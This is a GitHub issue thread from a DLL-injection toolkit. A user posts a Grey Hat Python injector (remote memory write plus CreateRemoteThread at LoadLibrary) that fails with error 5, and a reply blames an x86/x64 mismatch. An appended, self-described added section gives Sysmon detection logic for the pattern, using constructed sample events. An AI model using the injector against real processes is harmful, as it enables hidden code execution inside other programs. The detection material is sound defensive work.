infodox / python-dll-injection

Python toolkit for injecting DLL files into running processes on Windows
http://insecurety.net

[!] Failed to inject DLL, exit... 5 #2

Open LittleHann opened 7 years ago

LittleHann commented 7 years ago

I ran into some strange things.

mysql code:

```python
#!/usr/bin/python
# Win32 DLL injector from Grey Hat Python
# Minor formatting cleanups done...
import sys
from ctypes import *

print "DLL Injector implementation in Python"
print "Taken from Grey Hat Python"

'''
if (len(sys.argv) != 3):
    print "Usage: %s " %(sys.argv[0])
    print "Eg: %s 1111 C:\test\messagebox.dll" %(sys.argv[0])
    sys.exit(0)
'''

PAGE_READWRITE = 0x04
PROCESS_ALL_ACCESS = ( 0x00F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM = ( 0x1000 | 0x2000 )

kernel32 = windll.kernel32
# pid = sys.argv[1]
# dll_path = sys.argv[2]
pid = 2312
dll_path = "C:\Users\Administrator\Desktop\pyplugins\ZhudongFangyu\ImgWalk.dll"

dll_len = len(dll_path)

# Get handle to process being injected...
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )

if not h_process:
    print "[!] Couldn't get handle to PID: %s" %(pid)
    print "[!] Are you sure %s is a valid PID?" %(pid)
    sys.exit(0)

# Allocate space for DLL path
arg_address = kernel32.VirtualAllocEx(h_process, 0, dll_len, VIRTUAL_MEM, PAGE_READWRITE)
print "arg_address: ", arg_address

# Write DLL path to allocated space
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, dll_path, dll_len, byref(written))

# Resolve LoadLibraryA Address
h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll")
h_loadlib = kernel32.GetProcAddress(h_kernel32, "LoadLibraryW")
print "LoadLibraryA: ", h_loadlib

# Now we createRemoteThread with entrypoint set to LoadLibraryA and pointer to DLL path as param
thread_id = c_ulong(0)

if not kernel32.CreateRemoteThread(h_process, None, 0, h_loadlib, arg_address, 0, byref(thread_id)):
    print "[!] Failed to inject DLL, exit...", kernel32.GetLastError()
    sys.exit(0)

print "[+] Remote Thread with ID 0x%08x created." %(thread_id.value)
```

When I run it, I get:

```
DLL Injector implementation in Python
Taken from Grey Hat Python
arg_address: 49938432
LoadLibraryA: 1978878195
[!] Failed to inject DLL, exit... 5
```

I don't know what's wrong. Can I get some tips?

numaru commented 7 years ago

Hello, it looks like you're trying to inject a 64-bit process while your Python process is x86.

This thread is related.
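
The script posted in this issue opens the target with `PROCESS_ALL_ACCESS` and starts a remote thread at a `LoadLibrary` address, a pattern Sysmon records as Event ID 10 (ProcessAccess) and Event ID 8 (CreateRemoteThread). The detection logic below is an added example, not part of the thread or the project's code; the event records, image paths, addresses and every PID except 2312 are constructed, and `make_event`, `parse_event` and `find_loadlibrary_injection` are hypothetical helper names.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
PROCESS_ALL_ACCESS = 0x00F0000 | 0x00100000 | 0xFFF  # same mask as the script: 0x1F0FFF
LOADERS = {"loadlibrarya", "loadlibraryw"}

def make_event(event_id, **data):
    """Render a constructed Sysmon-style event as XML (sample input only)."""
    body = "".join('<Data Name="%s">%s</Data>' % kv for kv in data.items())
    return ('<Event xmlns="%s"><System><EventID>%d</EventID></System>'
            '<EventData>%s</EventData></Event>' % (NS["e"], event_id, body))

def parse_event(xml_text):
    root = ET.fromstring(xml_text)
    fields = {d.get("Name"): d.text or "" for d in root.iterfind("e:EventData/e:Data", NS)}
    fields["EventID"] = int(root.findtext("e:System/e:EventID", namespaces=NS))
    return fields

def find_loadlibrary_injection(xml_events):
    """Return (source_pid, target_pid, had_all_access) for each remote thread
    whose start address resolves to kernel32!LoadLibraryA/W."""
    all_access = set()  # (source, target) pairs seen in Event ID 10
    findings = []
    for ev in map(parse_event, xml_events):
        pair = (ev.get("SourceProcessId"), ev.get("TargetProcessId"))
        if ev["EventID"] == 10:
            if int(ev.get("GrantedAccess", "0"), 16) == PROCESS_ALL_ACCESS:
                all_access.add(pair)
        elif ev["EventID"] == 8:
            module = ev.get("StartModule", "").lower()
            if module.endswith("\\kernel32.dll") and ev.get("StartFunction", "").lower() in LOADERS:
                findings.append(pair + (pair in all_access,))
    return findings

# Constructed sample: PID 4120 (python.exe) opens PID 2312 and starts a thread
# at LoadLibraryW; PID 900 starts a remote thread with no resolved start module.
SAMPLE = [
    make_event(10, SourceProcessId=4120, SourceImage=r"C:\Python27\python.exe",
               TargetProcessId=2312, GrantedAccess="0x1F0FFF"),
    make_event(8, SourceProcessId=4120, SourceImage=r"C:\Python27\python.exe",
               TargetProcessId=2312, StartAddress="0x0000000075F2DE33",
               StartModule=r"C:\Windows\System32\kernel32.dll", StartFunction="LoadLibraryW"),
    make_event(8, SourceProcessId=900, TargetProcessId=1200,
               StartAddress="0x00007FF6A1B20000", StartModule="", StartFunction=""),
]

if __name__ == "__main__":
    for finding in find_loadlibrary_injection(SAMPLE):
        print(finding)
```

Sysmon infers `StartModule` and `StartFunction`, and leaves them empty when the start address lies outside loaded modules or known exports, so an empty value deserves its own review rather than being treated as clean. Event ID 10 is only logged when the Sysmon configuration includes ProcessAccess rules.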